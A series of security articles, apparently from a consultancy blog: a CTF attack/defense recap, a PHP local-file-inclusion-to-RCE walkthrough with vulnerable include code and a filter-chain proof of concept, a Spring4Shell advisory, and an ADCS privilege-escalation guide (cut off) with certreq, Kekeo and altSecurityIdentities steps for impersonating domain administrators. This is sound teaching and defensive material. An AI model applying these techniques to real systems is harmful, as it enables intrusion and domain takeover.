We quickly decided to increase our visibility on the situation by running tcpdump and analyzing the traces with Wireshark and what we observed was a lot of different exploits. Patching the issues was not as easy as initially thought due to the potential number of entry points and the impact of the patches on the services. However, by looking at other people exploits, we were able to replicate them and launch them at other teams to compensate for the points that we were loosing.

At one time, we noticed that one of our exploits, which should have been working, did not. We had code execution on a server, but it was impossible to read the flag files: the team had found a way (which was borderline anti-game in our mind, but still) to make the flag unreadable by the vulnerable services and only to the organizers. This lead us to tighten the host security by focusing on least privilege strategy:

• The flags should in theory not be read by more than the user launching the service and the organizer’s account
• Teams were actively exploiting one service to dump all flags at once
• Therefore, we decided to create new groups on the host restricted to these users, and make the flags unavailable to other service accounts

This became quite efficient, and the visibility we gained gave us much insight and what could be exploited and what needed to be patched. Due to our hardening actions, we had finally reduced the amount of points lost due to flag stealing, so we had time to focus on creating exploits, some of them quite basic, but which worked on almost half of the teams until the end!

Two or three hours before the end, a few teams managed to break out of the containers and services to get root permissions on other teams boxes. They quickly began to install persistence, create flag stealing scheduled tasks, and perform binary backdooring. At this point, at every tick of the exercise, they were stealing all four flags from each VM effortlessly which gave them lots of points, locking the podium away. Like in real-life, it becomes very complex to eliminated the persistence due to the simplicity of reinstalling it in opposition to the number of entry points to patch.

Our strategy designed on-the-fly still granted us the 4th place, which was a nice surprise for us:

Takeaways

We really did appreciate the format of the exercise and its quality. It was a welcomed change from the standard jeopardy format we had been playing for years and it forced us to think differently. In some ways it was much closer to our pentester / incident responder daily jobs:

• Sometimes we have to focus on impacting vulnerabilities rather than exhaustivity, for example during red team assignments from the Internet
• It gave us insight on the complexity of patching vulnerable applications in a limited timeframe with limited to no impact on its business features
• It highlights the effect of stress during situations such as cyber crisis where organization between actors is the key factor, but too often neglected in favor of other seemingly important actions 

However, if we take a step back, we also noticed that:

• The complexity of organizing such an event is really high: the system and network infrastructure would need to be perfect in every way for it to work as intended. But there are always unplanned issues and bugs which allow for bypassing some of the game’s rules and the limit between fairness and antigaming is often blurry.
• Due to the limited time of the exercise, we almost never had the time to implement recommandations that we would communicate to our clients after a pentest. There were too many hotfixes with limited efficiency and even more limited clarity.

I would like to conclude this article by really thanking all the actors involved in this event:

• The organizers Defcamp team and CyberEdu for setting up this exercice
• The other teams, for letting us exploit their vulnerabilities and for coming up with always inventive exploits, patches and backdoors
• My colleagues from YoloSw4g team: Maxime MEIGNAN, Gauthier SEBAUX, Thomas DIOT, Yoann DEQUEKER
• All CTF players from Wavestone who keep the team alive and allow us to participate in these competitions

Jean MARSAULT

Cet article Defcamp finals 2022: Feedback on our first Attack/Defense CTF est apparu en premier sur RiskInsight.

Context

The CTF featured many challenges across many categories (reverse, binary exploitation, crypto, forensics, etc.), but one of the web application challenges kept us busy for long. The challenge presented itself as a simple PHP web application with multiple pages, and the user could switch between them by changing the ?p= GET parameter available. This usually results in a Local File Inclusion (LFI) vulnerability, with the backend PHP code being one of:

<?php

include $_GET['p'];
include 'includes/' . $_GET['p'];
include $_GET['p'] . '.php';

?>

These codes (and all derivatives) allow users to include almost any file from the server hosting the application and to which the web server service account (usually www-data) has access. In many cases, malicious users can exfiltrate data, leak the application source code, unveil secrets and passwords, etc. But in few specific ones, it is also possible to achieve Remote Code Execution (RCE). Over the years, the number of techniques on which one could rely to transform an LFI into an RCE grew in size, with the following examples:

• Abusing the PHP_SESSION_UPLOAD_PROGRESS (Orange)
• Abusing arbitrary data in PHP sessions (RCE Security)
• Abusing nginx’s temporary files (Hacktricks)
• Using phpinfo(), php://input, zlib://compress, etc.

One common element about all these techniques is that they all rely on (at least) an additional requirement. If not present, the LFI cannot be converted into RCE, and the pentester gets sad.

The usual trick

The web application we had under scrutiny was unfortunately so simple that all of these techniques did not work. We tried to exfiltrate interesting files from the server (/etc/passwd, Apache/nginx virtual host configuration, process environment, etc.) but nothing interested could be found.

Using this technique, it is not possible at first to exfiltrate PHP source files, since they are executed when they enter the include or require statement. However, it is possible to rely on the php:// stream and its filter function to apply a Base64 encoding before including the file, therefore changing the active content into innocent plaintext. For example: http://webapp/?p=php://filter/convert.base64-encode/resource=index.php.

Though this trick worked, it only showed that there was not interesting content or flag within the available source code. Time to dig deeper!

Universal PHP LFI to RCE

After many minutes hours of research, we finally came across this recent article (2 months) by Hacktricks, that explained how the same php://filter trick could be used (in combination with other encoding filters) to produce arbitrary content. This allows for generating a Base64-encoded minimalist webshell, which can be decode by a final convert.base64-decode filter into active PHP content.

But exactly how is generated this arbitrary content, from uncontrolled sources? The first thing to notice is that the exploit requires knowing the path of a file with read access (such as /etc/passwd), but the content of the file is almost irrelevant (it only needs some printable characters in the file).

The whole exploit leverages the special convert.iconv.UTF8.CSISO2022KR encoding filter. Its particularity is that it prepends the output string with \x1b$)C, therefore generating some semi-known content (there will always be the character “C”). Then, it uses the convert.base64-decode filter (which is extremely tolerant on characters not in the Base64 set) to remove the unprintable part of the string, followed by convert.base64-encode to restore our uppercase “C”. Finally, if the Base64 encoding produced equal signs (which could disturb the behaviour of subsequent operations), they can be removed with the convert.iconv.UTF8.UTF7 filter.

The same way we can now produce the “C” character, the authors of the exploit managed to find chaining of encodings that can produced any character from the Base64 set, most importantly prepending a user-controlled string. By combining all the filter chains for all characters for the known Base64-encoded webshell string (in reverse order), the exploit generates said string, followed by lots of (printable) garbage. The final convert.base64-decode filter decodes the webshell (and the garbage), and the include() or require() statement executes it!

Proof of Concept

What better testing environment than a clean and up-to-date docker container. Let’s build our Dockerfile:

FROM debian:latest

RUN apt update --fix-missing && \
    apt upgrade -y && \
    apt install -y apache2 libapache2-mod-php php
WORKDIR /var/www/html

VOLUME ["/var/www/html"]

ENV APACHE_RUN_USER www-data
ENV APACHE_RUN_GROUP www-data
ENV APACHE_LOG_DIR /var/log/apache2
ENV APACHE_PID_FILE /var/run/apache2.pid
ENV APACHE_RUN_DIR /var/run/apache2
ENV APACHE_LOCK_DIR /var/lock/apache2

RUN mkdir -p $APACHE_RUN_DIR $APACHE_LOCK_DIR $APACHE_LOG_DIR
EXPOSE 80

ENTRYPOINT [ "/usr/sbin/apache2" ]
CMD ["-D", "FOREGROUND"]

Let’s also prepare our vulnerable PHP file:

<?php include $_GET['p']; ?>

And finally build and test it:

root @ server $ docker build .
...
Successfully built 23dc284ec248

root @ server $ docker run --rm -p 11111:80 --mount type=bind,source=$(pwd)/www,target=/var/www/html 23dc284ec248

root @ server $ curl 'http://localhost:11111/?p=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Finally, we can slightly adapt Hacktricks’ script to target our local URL and use a different parameter:

root @ server $ python3 attack.py | hexdump -C | less

00000000  75 69 64 3d 33 33 28 77  77 77 2d 64 61 74 61 29  |uid=33(www-data)|
00000010  20 67 69 64 3d 33 33 28  77 77 77 2d 64 61 74 61  | gid=33(www-data|
00000020  29 20 67 72 6f 75 70 73  3d 33 33 28 77 77 77 2d  |) groups=33(www-|
00000030  64 61 74 61 29 0a 0a 06  ef bf bd 0a 50 dc 9b ef  |data).......P...|
00000040  bf bd ef bf bd 0e ef bf  bd 0e ef bf bd 0e ef bf  |................|
00000050  bd 0e ef bf bd ef bf bd  ef bf bd ef bf bd 0e ef  |................|
00000060  bf bd dc 9b ef bf bd ef  bf bd 0e ef bf bd d8 9a  |................|
00000070  5b ef bf bd d8 98 5c ef  bf bd 02 ef bf bd 18 59  |[.....\........Y|
00000080  5b 5b db 8e ef bf bd 0e  ef bf bd 4e ef bf bd 4e  |[[.........N...N|
....

Preventing

There are many ways one can prevent a malicious user from turning a (not so) benign LFI into a full-blown RCE:

<?php

// Do not use this!
while(strpos($payload, 'filter')!==FALSE) { $payload = str_replace('filter', '', $payload); } 


// Slightly better, but still...
$payload = './' . $payload;


// Leverage builtin functions!
assert(stream_wrapper_unregister('php'));

?>

That’s all folks!

Cet article Barb’hack 2022: Leveraging PHP Local File Inclusion to achieve universal RCE est apparu en premier sur RiskInsight.

Overview

Spring is a lightweight opensource application framework for Java. It allows for easy development and testing of Java applications.
Spring is used to create Java enterprise applications. It provides means to build applications and supports different scenarios.
A new vulnerability was found in Spring Core leading to a Remote Code Execution.

On March 31st, a CVE was released: Spring4Shell (CVE-2022-22965)

Exploitability

Prerequisites

/ JDK9.0 or higher

/ Spring Framework 5.3.0 to 5.3.17 or 5.2.0 to 5.2.19 & older versions

/ Apache Tomcat as the servlet container

/ Spring-webmvc or spring-webflux dependency

/ Packaged as a traditional WAR

Risks 

Once all prerequisites are met, the Spring4Shell exploit allows for unauthenticated Remote Code Execution on the vulnerable host. This initial access may lead to further harmful infection steps by attackers.

A list of applications and vendors that have published a statement indicating if their product was affected is available:

https://www.kb.cert.org/vuls/id/970766

Difficulty

Many researchers are still sceptical as to how achievable this exploit is. It is now clear that due to the heavy prerequisites of the exploit, it should occur in fewer cases than the Log4Shell exploit. However, once the prerequisites are met, exploiting the vulnerability is pretty straightforward and has fewer constraints than Log4Shell (egress traffic is not needed).

Real-world examples

Some real-world examples meet the prerequisites. Some researchers have found that the Handling Form submission sample code provided by Spring in one of their tutorials is vulnerable to the Spring4Shell exploit.

Mitigations

Main recommendation: Update applications to Spring Framework 5.3.18 or 5.2.20 if possible

Manual workaround:

This section is applicable only if it is not possible to update the applications as mentioned above.

A temporary fix may be manually applied to mitigate the possibility of the Spring4Shell exploit: the following class must be created under the project package of the application system. After making sure the class is loaded by Spring, the project must be recompiled. This workaround only works against exploits known at this time, it’s effectiveness may not be guaranteed in the long term.

Good practice:

Point of attention:

The Spring4Shell exploit only provides command execution on the vulnerable host: it allows for initial access on a server exposed to the Internet. Commands will be executed in the context of the running application. A healthy, up-to-date infrastructure, as well as a good application of the least privilege principle, may greatly mitigate Spring4Shell’s impact.

Cet article Identity card of the Spring4Shell vulnerability by CERT-W est apparu en premier sur RiskInsight.

Similar intricate systems, such as Microsoft Exchange, have highlighted a significant number of ways that someone with a user account on Active Directory and malicious intent can benefit from to take over Active Directory.

Active Directory Certificate Services (ADCS) have never really been under security scrutiny until a few years ago (by C. Falta and later Q&D Security). We will therefore focus today on how similar techniques can be used to gain Domain Admins privileges.

Note: this article assumes that the reader has a correct understanding of Active Directory and/or PKI operation; some sections may be skipped depending on the reader experience and level of expertise.

Table of contents

1. Active Directory pentest: mission briefing
   1. Context and objectives
   2. Elevating privileges in an AD environment
      1. From lateral movement…
      2. … to compromise graphs
      3. Drafting the domain compromise graph
2. Deep dive into Microsoft ADCS
   1. What is ADCS?
   2. How does ADCS operate?
      1. Active Directory: Public Key Services
      2. ADCS server: local configuration
      3. Mixing it all together!
   3. Kerberos, smartcard logon and certificate authentication
      1. Kerberos 101
      2. Introducing PKINIT
      3. Using PKINIT in real life
3. Elevating privileges with ADCS
   1. Exploiting an existing ADCS misconfiguration
   2. The insidious case of EDITF_ATTRIBUTESUBJECTALTNAME2
   3. Local administrator rights on ADCS server
   4. ACL exploit on user objects (1)
   5. ACL exploit on user objects (2)
   6. ACL exploit on certificate templates
   7. ACL exploit on enrollment services
4. Current mitigations
   1. Integration within the Active Directory tiering model
      1. ESAE: Enhanced Security admin Environment
      2. Moving ADCS objects up one tier!
   2. Proper handling of corner cases
      1. Context example
      2. Setting the manager approval
      3. Choosing your CA managers
   3. Adding the detection layer

Active Directory pentest: mission briefing

This article will tackle Microsoft ADCS and its potential issues under the specific prism of an Active Directory pentest, but the conclusions will be applicable on a broader scope: red team assignments, ADCS hardening, etc.

Context and objectives

An Active Directory pentest is a type of assignment where the sponsor of the audit is asking the pentester to interact with the audit target’s infrastructure to find ways of gaining control of Active Directory. The auditor usually performs this task under the two following approaches:

• The black box approach: it simulates an attacker who already has physical access to the target’s premises (and consequently to network plugs and physical devices); the goal is often to progress towards the grey box approach, leveraging unencrypted hard drives, credential sniffing, guest access and misconfigured applications on vulnerable assets;
• The grey box approach: the pentester acts as a malicious or compromised user, within the context of its domain session, i.e. being able to execute arbitrary code as this user.

In our case, we will focus on the grey box approach, therefore considering a malicious party who already has the ability of interacting with the domain as a standard user with no specific rights. The goal of the pentester would be to find a way to leverage the current rights of the user on the domain to compromise high-privileged principals, frequently the members of the Domain Admins group.

Elevating privileges in an AD environment

From lateral movement …

Historically, Windows has been built as a user-friendly operating system, which means that it will do its best to minimize the number of situations where a user must type its password. In terms of user experience, most users will only type their password to unlock their workstation. System administrators may have to type it another time when using the Remote Desktop Protocol (RDP), but they don’t expect it to type it again when connected to the remote server and/or interacting with domain resources.

Under the hood, it means that Windows offers Single-Sign-On (SSO) features, which allow the system to authenticate as the user to other systems or applications. This sleight of hand is performed by the lsass.exe process, which caches usable credentials for the user in memory. There are two types of credentials that can be cached:

• Authenticators derived from credentials, e.g. the password itself, or its NT hash
• Authenticators retrieved thanks to other means, e.g. Kerberos tickets

The credentials are cached into the memory of the lsass.exe process running with the System integrity level. Either processes running as SYSTEM, or processes with SeDebugPrivilege enabled (which by default can only be enabled by local administrators) would be able to peek into lsass.exe memory.

Various tools, such as Mimikatz and Windows Password Recovery, allow users with local administration rights to extract the aforementioned authenticators from the memory:

Mimikatz extracting authenticators from lsass.exe process memory

These authenticators in turn can be used to log in onto other workstations and servers, using techniques such as Pass-the-Hash or Pass-the-Ticket. The use of these techniques is included in what is called Lateral Movement and allows progressing from low-privileged assets to high-privileged ones.

… to compromise graphs

In a grey box approach, a pentester would usually be provided with a standard network access, a domain-joined workstation and a basic user account. Assuming local administration rights are somehow obtained, the pentester would then gather:

• The local accounts’ credentials in the SAM database (NT hashes)
• The local and domain accounts’ authenticators which recently logged in (NT hashes and Kerberos tickets, even cleartext passwords under some conditions)

Using this newly found credential, the next objective is to try using them on the other assets in the domain. If this works, the operation can be repeated, each time gaining more and more foothold on the domain.

This progression is quite easily performed by hand in a lab domain a limited number of workstations and servers but cannot be humanly feasible in a real-life domain with hundreds of servers and thousands of users and workstations (without mentioning domain trusts, etc.). This is where graph theory comes into play, with the following equivalents:

• Vertices (nodes) represent domain assets: user objects, computer objects and group objects
• Oriented edges connect two vertices when one has the ability to compromise the other (also called control path)

With such a graph, one would quite easily find (if it exists), the shortest path from a basic user account to a high-privileged principal on the domain. The only remaining task would be to exploit it. A path from one principal to another is called a compromise path, and the set of compromise paths between two principals represent all the means at one’s disposal to compromise the latter starting from the former:

Compromise paths between a user and a member of the Domain Admins group

Drafting the domain compromise graph

In order to build the domain compromise graph, a list of possible edge types has to be defined. Lateral movement using credential dumping is often central, but it is not the only way of compromising principals. The current list includes (but is not limited to):

• Domain group membership
• Being local administrator of a target
• Having an open session on a target
• Ability to connect to a target using RDP (generally implicitly combined with the ease of privilege escalation)
• Domain principal ownership
• Permissive Access Control Entries (ACEs) over domain objects: GenericAll, GenericWrite, WriteProperty, etc.
• “By design” compromise paths from built-in groups: Server Operators, Backup Operators, DNS Admins, etc.

Building domain compromise graphs is particularly difficult to perform by hand, especially on large domains. There exist tools that help building these graphs and adding edges to find compromise paths.

Although many tools exist (Tenable.ad, AD-Control-Paths, PingCastle), the most famous one is BloodHound, and it leverages most of known techniques used to compromise accounts:

Example graph generated by BloodHound

Deep dive into Microsoft ADCS

What is ADCS?

Microsoft Active Directory Certificate Services (ADCS) is a role that can be given to servers who will act as Certification Authorities (CA) in the forest. It integrates naturally within the forest, which means that there are domain objects that represents the different actors involved in a PKI lifecycle, and Access Control Lists regulating the interactions between these actors:

• Certificate template management
• Certificate enrolment
• Certificate revocation
• CRL publication
• etc.

How does ADCS operate?

The ADCS server role is installed on every server that is to act as a CA. When installing the ADCS role, the administrator is presented with twochoices: first, either install a Standalone or an Enterprise CA:

CA setup type choice

Then, in the case of an enterprise CA, it can be positioned as a Root CA or Subordinate CA:

CA type choice

This article will focus on the Enterprise Root CA, for which the configuration is split between two places:

• Active Directory, in which information global to the PKI infrastructure is stored: names and location of CA servers, global rights, etc.
• The Windows servers on which the ADCS role is installed, on which the day-to-day configuration parameters specific to this Certification Authority are stored: CA administration rights, certificate emission parameters, etc.

Active Directory: Public Key Services

In Active Directory, the configuration is stored under the following location (Configuration partition, thus defined at forest-level):

CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local

The configuration can be viewed using the adsiedit.msc component in the MMC:

Global PKI configuration in Active Directory

Certificate templates

The CertificateTemplate container has one domain object of type pKICertificateTemplate for every template to be shared amongst the enterprise Certification Authorities. These templates define, through attributes configured on their domain object, a set of policies that mostly describe and constrain:

• General settings: the validity period of the delivered certificates
• Request handling: the purpose of the certificate and the ability to export the private key (although this can be bypassed if the private key is generated prior to the certificate request, for example with the certreq binary)
• Cryptography: the Cryptographic Services Provider (CSP) to be used and the minimum key size
• Extensions: the list of X509v3 extensions to be included in the certificate, and their criticality (including the KeyUsage and ExtendedKeyUsages)
• Subject name, which dictates how the Distinguished Name of the certificate is built: either from a user-supplied value in the request, or from the identity of the domain principal requesting the certificate
• Issuance requirements: the need for a “CA certificate manager” approval in order to deliver the certificate
• Security descriptor: the ACL of the certificate template, including the identity of the principals who have the extended right needed to enroll to the template

Access Control List of a pKICertificateTemplate object

Enrollment services

The Enrollment Services provides domain principals with the list of enterprise ADCS servers with the domain, under the following naming convention:

CN=<CA name>,CN=Enrollment Services,CN=Public Key Services,...

The attributes of these objects describe these Certification Authorities, how the principals can reach them, and what they are authorized to do:

• The dNSHostName attribute corresponds to the FQDN (or alias) of the ADCS server
• The certificateTemplates attribute lists a subset of the Certificate Templates that the principals are allowed to request certificates for from this Certification Authority
• The Security Descriptor (available through the “Security” tab) lists the actions that principals are allowed to do on the Certification Authority or the current domain object: enroll, modify the list of certificate templates, etc.

pKIEnrollmentService object

NtAuth enterprise store

The NtAuthCertificates is a domain object which contains a list of CA certificates (in the cACertificate attribute). This list dictates which certificates will be valid for authentication purposes across the domain, as authentication services will look for the direct issuer CA within this enterprise store:

NtAuth store contents

It is important to note that workstations and servers (including Domain Controllers) keep a local cached version of this store in the Windows Registry, at the following location:

HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates

Any update will not be replicated unless the following command is issued locally (or after a while when the machine GPO is refreshed):

gpupdate /force

Other enterprise certificate stores

The Certification Authorities and AIA (Authority Information Access) containers correspond respectively to the Root Certification Authorities and Intermediate Certification Authorities certificate stores for the domain. Every object present in these stores has its cACertificate attribute set to the certificate of said authority. This enterprise store is automatically replicated within the local stores of domain workstations and servers. Additional parameters, such as crossCertificatePair, can be also set in some cases.

certificationAuthority object

Certificate revocation list

The CDP (CRL Distribution Point) container aims at providing the domain with Certificate Revocation Lists for each enterprise ADCS server installed. Therefore, each sub-container has an object, which contains the CRL (optionally delta CRL) in the certificateRevocationList (optionally deltaRevocationList), named as follows:

CN=<CA name>,CN=<ADCS server>,CN=CDP,CN=Public Key Services,...

cRLDistributionPoint object

Miscellaneous objects

The KRA (Key Recovery Agent) and OID containers describe objects and parameters vital to the ADCS servers, but on which focus is not mandatory in this context.

ADCS server: local configuration

In addition to the global configuration stored in Active Directory, each ADCS server can be locally configured to tune its behavior regarding day-to-day operations. These rights allow users and groups to perform various actions linked to the Certification Authority, such as:

• Certificate request validation
• Certificate revocation
• Certificate Revocation List (CRL) publication
• Certification Authority renewal
• etc.

This extensive set of rights is organized under roles, which limits the fine tuning of access rules but provides a Role Based Access Control (RBAC) mechanism. The following matrix summarizes the 4 roles and the main actions associated with them:

Local rights matrix for ADCS servers

The attribution of roles to users and groups can be configured from the “properties” contextual menu of the Certification Authority instance (using the certsrv.msc MMC component):

Local attribution of roles on the CA server

Access to these configuration parameters and global PKI operation can be mostly performed remotely using Remote Procedure Call (RPC), via the Microsoft Management Console (MMC).

Mixing it all together!

The heart of the day-to-day interactions with ADCS and CA servers resides in the certificate templates and enrollment services:

• Each enrollment service links to a CA server with the ADCS role – additional settings can be configured locally on a per-server basis, mainly stored in the registry
• The enrollment service lists a subset of the certificate templates published:

ADCS operation overview

Finally, in order to request a certificate, the user / computer must: ​

• Have the enrollment rights on the Enrollment Service
• And have the enrollment rights on the target Certificate Template​
• Be able to reach the CA server on port 135 (RPC) and high dynamic ports (usually start at 49152)

Kerberos, smartcard logon and certificate authentication

Kerberos 101

Authentication in Active Directory is mostly performed using one two authentication protocols:

• The NTLM challenge-response, solely based on the NT hash of the principal
• Kerberos – a protocol originally designed by the MIT – which uses tickets and secrets keys

In its most simple form, Kerberos operates as follows:

1. An Active Directory principal (user, computer) emits an AS-REQ request to the Authentication Service (AS); this request contains a pre-authentication message that validates the principal’s identity
2. If the authentication succeeds, the AS replies with an AS-REP which includes a Ticket-Granting-Ticket (TGT) delivered by the Key Distribution Center (KDC)
3. The principal then sends TGS-REQ requests to the Ticket-Granting-Service (TGS), including the TGT, to ask for an ticket built for an Active Directory service – an AD principal whose servicePrincipalName attribute is not empty
4. The KDC replies with an TGS-REP which includes a Service Ticket (ST) encrypted with the service’s secret key (RC4 key (NT Hash), AES-256 key, etc.)
5. The principal can authenticate to said service with an AP-REQ request by sending the ST, which will be decrypted by the service to identify the client principal
6. If everything is in order, the service replies with an AP-REP message:

Kerberos authentication graphical representation

Introducing PKINIT

The type of pre-authentication to be used is described in the padata-type field of the AS-REQ request. The most common value is PA-ENC-TIMESTAMP, which works by encrypting a timestamp token with one of the user’s secrets (NT hash, AES key, etc.). The complete list of values that can be used within a Microsoft environment is detailed in [MS-KILE].

Kerberos authentication using smartcards relies on the PA-PK-AS-REQ value and uses the PKINIT [RFC4556] protocol. This protocol defines how public key cryptography can be used as a pre-authentication mechanism in Kerberos, whereas usually it uses symmetric cryptographic protocols (using shared secrets derived from the password).

PKINIT needs to identify the authenticating Active Directory object based on sent elements, as described below:

Global overview of PKINIT operating

Like in the standard mode, a timestamp token is generated that will later ensure the freshness of the authentication. This token is signed with the user’s private key, the corresponding certificate is sent in the AS-REQ packet and, depending on the type of mapping intended (explicit or implicit), either a principal name or hints that can be used to locate the principal. The detailed operating of the implicit and explicit mappings is described below:

Details of PKINIT operating (source)

Once the Active Directory object is located, depending on the path taken, the certificate will have to meet the NT_AUTH policy, i.e. having its direct issuer’s certificate included in the NtAuth enterprise store.

Then, the authentication server will verify that the certificate « Enhanced Key Usage » extension contains either “Client Authentication” (1.3.6.1.5.5.7.3.2), “Microsoft Smartcard Logon” (1.3.6.1.4.1.311.20.2.2), “Key Purpose Client Auth” (1.3.6.1.5.2.3.4) or “Any purpose” (2.5.29.37.0).

Finally, the KDC will verify that the certificate provided links to a trusted root Certification Authority, is valid (dates and revocation) and that the signature of the timestamp token is cryptographically correct. If all checks pass, the user is provided with a TGT for the located AD object.

Using PKINIT in real life

The PKINIT protocol is automatically used when smartcard logon is performed. The authentication GUI detects that a smartcard can be used, and, if the user provides the correct PIN, uses the embedded private key to sign the pre-authentication data.

By default, only the associated certificate is sent but administrators can enable the use of “name hints” through local policies (Computer Configuration > Administrative templates > Windows components > Smartcard > Allow username hints):

Providing name hints alongside the certificate

It is also possible to use third-party tools to request a TGT using PKINIT and load it alongside legitimate tickets in the user’s session. In the examples below, the current user has two certificates in its store:

• A certificate named “Explicit” with thumbprint 9c7bd7...1ce0b and mapped to the APERTURE\GlADOS domain user via its altSecurityIdentities attribute
• A certificate named “Implicit” with thumbprint f414...000c8 and including the userPrincipalName set as cave@aperture.science

With Kekeo

Kekeo is a piece of software developed by Gentilkiwi, the author of the well-known tool Mimikatz. It aims at providing its users with utilities to easily manipulate Windows API related to Kerberos and other protocols. However, if detected, it is hard to compile anew to evade detection due to the use of the commercial ASN.1/C library.

The screenshots below detail how Kekeo provides support for PKINIT:

Using PKINIT with explicit mapping

Using PKINIT with implicit mapping in kekeo

With Rubeus

As described on the tool’s GitHub repository, Rubeus is a C# toolset for raw Kerberos interaction and abuses. Its advantage comes from the fact that it can be easily recompiled to evade detection from security tools.

The screenshots below detail how Rubeus provides support for PKINIT, although username hints are mandatory since the /user switch must be provided:

Using PKINIT with explicit mapping in Rubeus

Using PKINIT with implicit mapping in Rubeus

Elevating privileges with ADCS

The idea behind exploiting ADCS-related control paths is mostly to fraudulently obtain a certificate to authenticate as a privileged principal using PKINIT. Based on the PKINIT decision graph, there are two ways that certificates that can be used to achieve this purpose:

• For explicit mappings, it needs to be configured on the target object as an alternative security identity
• For implicit mappings, it needs to includes the UserPrincipalName (UPN) of the target principal in the Subject Alternative Name extension

The sections below aim at detailing the prerequisites needed to conduct the attack, and how it can be performed.

Exploiting an existing ADCS misconfiguration

In some cases, no additional ACL exploit is needed because there are existing certificate templates that already validate the prerequisites needed to request an authentication certificate for any other principal:

• The template is listed in at least one of the enrollment services, and both grant the enroll rights to one of the assets (user, computer) already compromised
• The server associated to the enrollment service is reachable on port 135 and high ports
• The template lists at least one of the following extended key usages: Client Authentication, Microsoft Smartcard Logon, Key Purpose Client Auth or Any Purpose
• The template allows supplying the subject name in the request
• No additional approval is required for the certificate issuance; such parameter can be configured at the template level – the list of validators is configured at the server-level and can only be determined by users with at least “Read” privileges on the CA

If all conditions are met, there are multiple options to request the certificate (certreq executable or the X509Enrollment COM object in PowerShell), but the fastest is to use the certmgr.msc MMC component:

Requesting a new certificate with the MMC

At the template selection menu, interesting templates will appear with a yellow warning sign, since they need the requester to supply the name of the subject:

Exploitable certificate template

Then, enter a friendly name in the common name of the certificate (since kekeo needs it to select the certificate), and the UPN of the target user in the alternative name section:

Filling the subject name

After enrollment, the certificate will be present in the Personal store and available to Kekeo and Rubeus to perform PKINIT with the identity of the target user (here administrator@lab.local):

Kekeo # tgt::ask /subject:ItDoesNotMatter

Authentication certificate retrieved

Subsequent sections present cases in which it is possible to exploit additional misconfigurations in Active Directory or on the ADCS servers to fall back to the situation and the exploit described above.

The insidious case of EDITF_ATTRIBUTESUBJECTALTNAME2

One of the most dangerous and misunderstood of the CA servers’ local settings is EDITF_ATTRIBUTESUBJECTALTNAME2. It was initially proposed as a way to allow for Subject Alternative Name (SAN) selection when using the certreq binary on command-line, and can locally be checked with:

C:\Users\Administrator>certutil -getreg policy\editflags

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\LAB ROOT CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\EditFlags:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.

This setting forces the CA to accept a user-selected SAN for every certificate template listed by this enrollment service. This means that even if the “Build for this Active Directory information” option is selected in the template options, the final SAN to be included in the certificate will be at the hand of the requester. This setting is fortunately disabled by default.

In this case, every authentication certificate template will be vulnerable to the previous exploit. In order to exploit it, create the following policy.inf file:

[Version]
Signature="$Windows NT$"
 
[NewRequest]
Subject = "CN=TEST"  ; will not be taken into account
Exportable = FALSE
KeyLength = 2048
KeySpec = 1
KeyUsage = 0xA0
MachineKeySet = FALSE ; TRUE if you want it in the machine store
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
RequestType = PKCS10
 
[Extensions]
2.5.29.17 = "{text}"
_continue_ = "upn=username@domain.tld"
 
 
[RequestAttributes]
; If your client operating system is Windows Server 2003, Windows Server 2003 R2, or Windows XP
; and you are using a standalone CA, SANs can be included in the RequestAttributes
; section by using the following text format.
 
SAN="upn=username@domain.tld"
CertificateTemplate = YourTemplateName

Then, the certreq binary is again used to build the request and submit it to the CA server, and finally to add the certificate to the store:

C:\> certreq -new policy.inf request.pem
C:\> certreq -submit request.pem cert.pem
C:\> certreq -accept cert.pem

Local administrator rights on ADCS server

There are multiple ways that domain and local users that are in the local Administrators group of CA servers can compromise the domain.

First, local administrators have full access to the registry, and therefore they can modify the CA policy settings to include the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute mentioned in the previous section. It will allow the exploitation of any authentication certificate template that is listed by the server, which usually is enough to craft a certificate viable for a PKINIT on a privileged user.

Secondly, local administrators are granted access to the machine certificate store, in which the CA private key is located. From there, there are multiple options to issue an authentication certificate, including:

• Use the certutil -sign command to re-sign an authentication certificate issued by the same CA, and modify on-the-fly its subject alternative name list
• Export the certificate and its private key, if exportable or by patching the private key file “exportability blob”
• Use Mimikatz to patch the CryptoAPI / CNG and export the certificate along with its private key

ACL exploit on user objects (1)

If one has some control on a domain user object, there are several ways that this object may be compromised. For example, its password can be changed (requires AllExtendedRights or ForceChangePassword), granting access to the account (watch out for side effects!).

A more silent way would be to modify the logon script by setting the Scriptpath attribute which only requires GenericWrite or specific Write to the attribute. It will execute any executable or script withing the context of the target’s session when it performs a logon.

There is another way of taking control over a user account (which is also fairly silent) by messing with the altSecurityIdentities attribute. As detailed in the PKINIT diagram, an explicit mapping can be created between a user object and a certificate, which then can be used to authenticate as the user.

Using the Microsoft Management Console (MMC), it can be performed through the “Active Directory Users & Computers” component:

Adding the MMC component

After enabling the “Advanced Features” in the “View” menu, it is possible to configure mappings through the “Name Mappings” option:

Select the name mappings

Then, just select the certificate that will be used to create the explicit mapping. Note that implicit mappings take precedence over explicit ones, so the certificate must not include an UPN, but it still needs to feature the correct Extended Key Usage:

Creating the explicit mapping

Under the hood, the GUI modifies the altSecurityIdentities attribute of the user in the following way:

Modification of the altSecurityIdentities attribute

The new value of the attribute is a collection of strings, so it may be modified rather easily with the Set-AdUser cmdlet or another AD editing tool such as adsiedit.msc or AD Explorer.

Finally, the authentication can take place, using your favorite tool (Kekeo, Rubeus, etc.):

Authenticating as Admin1 with explicit mapping from Administrator’s certificate

ACL exploit on user objects (2)

